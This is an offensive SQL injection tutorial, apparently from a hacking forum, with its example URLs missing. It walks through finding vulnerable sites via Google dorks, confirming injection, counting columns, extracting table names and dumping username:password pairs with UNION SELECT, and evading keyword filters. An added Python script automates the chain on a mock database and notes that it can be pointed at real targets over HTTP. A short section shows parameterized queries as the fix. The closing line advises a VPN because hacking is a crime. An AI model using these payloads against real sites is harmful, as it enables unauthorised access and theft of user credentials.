1) What is SQL Injection?
SQL Injection is a type of web attack. The attacker uses a hole in a script (user input pasted straight into a database query) to read everything in the database. Vulnerable sites have URLs in this format:
You can put anything else instead of index.
2) Finding vulnerable sites:
The easiest way to find vulnerable sites is with Google. We use the dorks below to find sites, but if you have your own, go ahead and use them:
3) Checking whether a site is vulnerable:
There are two ways to check whether a site is vulnerable.
1st way, we have the link:
We add only a ' (single quote) at the end of the link, so we get this link:
2nd way, we have the link:
We add +and+1=2-- at the end of the link, so we get:
If some part of the page disappears (a picture, text or something else) or you get a database error such as "You have an error in your SQL syntax", the site is vulnerable. To be sure it is the condition and not the trailing comment that breaks the page, also try +and+1=1--: that one should leave the page unchanged.
4) Finding the number of columns
We do it with ORDER BY on the link:
If the page opens normally, the query has at least 5 columns. Let's try 10.
Now some part of the site disappeared, which means there are at least 5 and fewer than 10 columns. Let's try 7.
The page opens normally, which means there are at least 7 and fewer than 10 columns. Let's try 8.
With ORDER BY 8 part of the site disappears, so there are exactly 7 columns. (ORDER BY n works as long as n is not bigger than the number of columns in the SELECT, so the largest n that still works is the column count.)
5) Finding vulnerable columns
Vulnerable columns are found with UNION SELECT ALL. On the link (in this case) we add +union+select+all+1,2,3,4,5,6,7--
It will write numbers on the page (in this case 1 2 3 4 5 6 7); each number that appears marks a column whose content is rendered, so data can be taken through any of them. If the original row is still shown, put +and+1=2 before the union so that only the injected row is displayed. We are going to take data through the second column.
6) Finding the database version
As I said, we take data through the second column. Instead of the number 2 we put version() or @@version
Where the number 2 was, the page will now show the database version.
If the database version is 4 we have to guess table and column names, but if it is 5 or newer we can read them from information_schema.
We have version 5.0.51a-24+lenny5, which means we don't have to guess table and column names.
7) Finding table names
If the database version is 4 you can't list table and column names; you have to guess them. If the database version is 5, skip the guessing.
Names of some possible tables:
Names of some possible columns:
If the database version is 5 we can read the table names like this: instead of the number 2 we put group_concat(table_name), and after the number of the last column we add +from+information_schema.tables+where+table_schema=database()--
So we get this link:
Instead of the number 2 it showed the table names, in this case date, book, users. We are going to take the columns of the users table.
8) Finding column names
We found the table we want, and now we want its column names. Instead of group_concat(table_name) we put group_concat(column_name), and instead of +from+information_schema.tables+where+table_schema=database()-- we put +from+information_schema.columns+where+table_name=hex-- where hex is the table name written as a hex literal (0x followed by the hex of the name), so that no quotes are needed in the URL.
Encode the name of the table (in this case users) and we get the hex string 7573657273, so the condition becomes table_name=0x7573657273-- and now we can see the columns:
9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is a colon (:) and separates the username from the password. Instead of +from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--
and we have the link:
and a result like:
which is the usernames and passwords from this site.
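The whole procedure from step 3 to step 9, as an added example that is not part of the original guide. It models the target with a constructed SQLite database and a constructed vulnerable handler, news_page(), which concatenates the id parameter into its query exactly as the hole described in step 1, and then runs the same probes the text describes against it. SQLite stands in for MySQL, so three things are swapped and labelled as such in the comments: sqlite_version() for version(), sqlite_master and pragma_table_info() for information_schema.tables and information_schema.columns, and username || ':' || password for group_concat(username,0x3a,password) (SQLite's group_concat takes a separator, not extra columns). Nothing here goes through a URL, so spaces are written as spaces rather than +, and quotes are used where the guide uses a 0x hex literal (in MySQL 0x7573657273 is the string 'users'; in SQLite it would be a blob). All function names are my own.

```python
import sqlite3

# Constructed sample database standing in for the target's MySQL backend.
SCHEMA = """
CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT,
                  posted TEXT, views INTEGER, tag TEXT);
INSERT INTO news VALUES (5, 'Welcome', 'First post', 'admin', '2009-01-01', 10, 'misc');
CREATE TABLE book(id INTEGER, title TEXT);
CREATE TABLE users(id INTEGER, name TEXT, surname TEXT, username TEXT,
                   password TEXT, level INTEGER);
INSERT INTO users VALUES (1, 'Ann', 'Smith', 'admin', 's3cret', 1);
INSERT INTO users VALUES (2, 'Bob', 'Jones', 'bob', 'hunter2', 0);
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def news_page(con, id_param):
    """Constructed vulnerable handler (the hole the guide exploits): the id
    parameter is pasted straight into the SQL text.  Returns (status, text):
    'error'   -> the database raised an error ("You have an error in your SQL syntax")
    'missing' -> the query returned no row (part of the page disappears)
    'ok'      -> normal page; text is the rendered title, i.e. column 2 of the SELECT."""
    sql = ("SELECT id, title, body, author, posted, views, tag FROM news WHERE id="
           + id_param)
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error:
        return "error", ""
    if row is None:
        return "missing", ""
    return "ok", str(row[1])


def is_vulnerable(con, good_id="5"):
    """Step 3: a stray quote should break the query, and 1=2 should make the
    content vanish while and 1=1 leaves it alone (so it is the condition, not
    the trailing comment, that changes the page)."""
    return (news_page(con, good_id + "'")[0] == "error"
            and news_page(con, good_id + " and 1=2--")[0] == "missing"
            and news_page(con, good_id + " and 1=1--")[0] == "ok")


def count_columns(con, good_id="5", limit=64):
    """Step 4: ORDER BY n works while n <= number of columns and breaks the page
    once it is larger.  Bisect instead of hand-guessing 5, 10, 7, 8."""
    if news_page(con, f"{good_id} order by {limit}--")[0] == "ok":
        raise ValueError(f"more than {limit} columns")
    lo, hi = 1, limit  # invariant: ORDER BY lo works, ORDER BY hi breaks
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if news_page(con, f"{good_id} order by {mid}--")[0] == "ok":
            lo = mid
        else:
            hi = mid
    return lo


def echoed_columns(con, ncols, good_id="5"):
    """Step 5: hide the real row with and 1=2 and UNION in a row of markers;
    the markers that show up on the page are the columns data can be pulled through."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    status, text = news_page(con, f"{good_id} and 1=2 union select all {markers}--")
    return [i for i in range(1, ncols + 1) if status == "ok" and text == str(i)]


def extract(con, ncols, expr, from_clause="", good_id="5", column=2):
    """Steps 6-9: put an expression in place of the marker of an echoed column,
    optionally followed by a FROM ... WHERE ... clause, and read the result back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[column - 1] = expr
    status, text = news_page(
        con, f"{good_id} and 1=2 union select all {','.join(cols)}{from_clause}--")
    return text if status == "ok" else None


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", is_vulnerable(con))
    n = count_columns(con)
    print("columns:", n, "echoed:", echoed_columns(con, n))
    # SQLite substitutes: sqlite_version() for version(), sqlite_master and
    # pragma_table_info() for information_schema, || for group_concat's extra args.
    print("version:", extract(con, n, "sqlite_version()"))
    print("tables:", extract(con, n, "group_concat(name)",
                             " from sqlite_master where type='table'"))
    print("users columns:", extract(con, n, "group_concat(name)",
                                    " from pragma_table_info('users')"))
    print("credentials:", extract(con, n, "group_concat(username || ':' || password)",
                                  " from users"))
```

Against a real target the only part that changes is news_page(): replace it with an HTTP request that returns the same three-way status (error text present, expected content missing, or normal), and keep the probes as they are. The bisection in count_columns() needs about six requests for any count up to 64 instead of the four lucky guesses in step 4.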
10) Filter bypassing
If the page says "not accessible" when you write union+select+all, the filter is probably matching the exact lowercase keywords; change it to UnIoN+sElEcT+aLl
On some sites spaces are filtered, so use + or /**/ instead (/* opens a comment in MySQL and */ closes it, and the comment counts as whitespace in the query)
On some sites version() itself is filtered, so use unhex(hex(version())), which returns the same string
11) Protecting a site from SQL Injection
The original guide gave this snippet for your script. It arrived here cut off: only the echo survives and the if (...) { in front of it is lost, so it is left as found:
echo 'It is gonna write text when someone tries to add \' or and+1=2';}
A check like this only catches the two test strings from step 3; the tricks from step 10 (UnIoN+sElEcT, /**/ for spaces, or any other always-false condition such as and+2=3) walk straight past it, and the query is still built by pasting the request into SQL text. The real fix is to never put user input into the SQL text at all: use a prepared statement with bound parameters (in PHP, PDO or mysqli prepare and bind), and for numeric ids check that the value is an integer before using it.
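An added example, not code from the original guide, that puts the three versions side by side in Python on a constructed SQLite table: the vulnerable lookup, the guide's idea of blocking the two test strings, and the parameterized query that actually fixes it. The payload used is also constructed: it picks a different always-false condition than the one the blacklist looks for and then uses the same UNION trick as steps 5 and 9. The names make_db, lookup_vulnerable, lookup_blacklist, lookup_parameterized and PAYLOAD are my own.

```python
import sqlite3


def make_db():
    # Constructed sample data: the public table the page reads and the one the attacker wants.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (5, 'Welcome');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return con


def lookup_vulnerable(con, id_param):
    """The hole: the request parameter is concatenated into the SQL text,
    so anything after the number is executed as SQL."""
    return con.execute("SELECT title FROM news WHERE id=" + id_param).fetchall()


def lookup_blacklist(con, id_param):
    """The guide's fix: refuse the two strings used in the vulnerability check.
    Only those two strings are stopped; the query is still built by concatenation."""
    if "'" in id_param or "and 1=2" in id_param.lower():
        return "blocked"
    return lookup_vulnerable(con, id_param)


def lookup_parameterized(con, id_param):
    """The real fix: the SQL text is constant and the value is bound separately.
    The database compares the whole parameter as one value, so it can never
    become part of the statement, whatever characters it contains."""
    return con.execute("SELECT title FROM news WHERE id=?", (id_param,)).fetchall()


# Constructed payload: "and 2=3" instead of "and 1=2" walks past the blacklist,
# then the UNION pulls a password out of the users table.
PAYLOAD = "5 and 2=3 union select all password from users--"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, payload:   ", lookup_vulnerable(con, PAYLOAD))
    print("blacklist, test string:", lookup_blacklist(con, "5 and 1=2--"))
    print("blacklist, payload:    ", lookup_blacklist(con, PAYLOAD))
    print("parameterized, normal: ", lookup_parameterized(con, "5"))
    print("parameterized, payload:", lookup_parameterized(con, PAYLOAD))
```

With the bound parameter the payload is compared against the id column as one string and matches nothing, which is the behaviour you want; converting the parameter with int() first and rejecting anything else is a cheap additional check for numeric ids, but the binding is what closes the hole.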
Hope you enjoyed it.
So, to be safe, always use a VPN when you hack a website, because it is a crime.